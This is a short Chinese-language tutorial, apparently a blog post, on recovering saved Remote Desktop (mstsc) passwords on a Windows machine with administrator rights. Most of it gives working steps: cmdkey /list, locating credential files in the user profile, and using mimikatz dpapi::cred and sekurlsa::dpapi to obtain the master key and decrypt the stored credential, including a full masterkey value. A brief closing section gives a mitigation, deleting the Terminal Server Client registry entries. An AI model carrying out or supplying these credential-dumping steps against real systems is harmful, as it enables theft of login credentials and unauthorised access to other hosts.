前提
再使用mstsc連接的是時候,管理員勾選了自動保存密碼連接的選項,還有就是有管理員權限.
簡單演示
首先查看該計算機上的連接記錄cmdkey /list

可以看到我們以MIKASA\administrator用戶登錄到了192.168.22.138所在的計算機上
查找本地的證書dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*

這個就是我們需要的證書,接下來使用mimikatz
mimikatz dpapi::cred /in:C:\Users\win7\AppData\Local\Microsoft\Credentials\84ABE84B19F0C5E57455560137F6DA2A
得到以下內容

guidMasterkey是我們需要的
使用 ::dpapi
mimikatz sekurlsa::dpapi

根據我們記錄的guidMasterkey得到MasterKey(加密密鑰)
最后就差解密了,我這里面是
mimikatz dpapi::cred /in:C:\Users\win7\AppData\Local\Microsoft\Credentials\84ABE84B19F0C5E57455560137F6DA2A /masterkey:0d3e445f2c9a47f9a842d56239f1753a77374953f3cca11df2eb93029dd45ce56bb9d98f24b38bfe46c74efaedbee6a04141ec028e1373a4e64763fad4476858

確實頂QAQ
防范措施
其實也就是吧憑據清除一下就行了,而windows一般將這些東西寫進注冊表里面
把注冊表對應的項刪除就行了

注冊表位於HKCU:\Software\Microsoft\Terminal Server Client\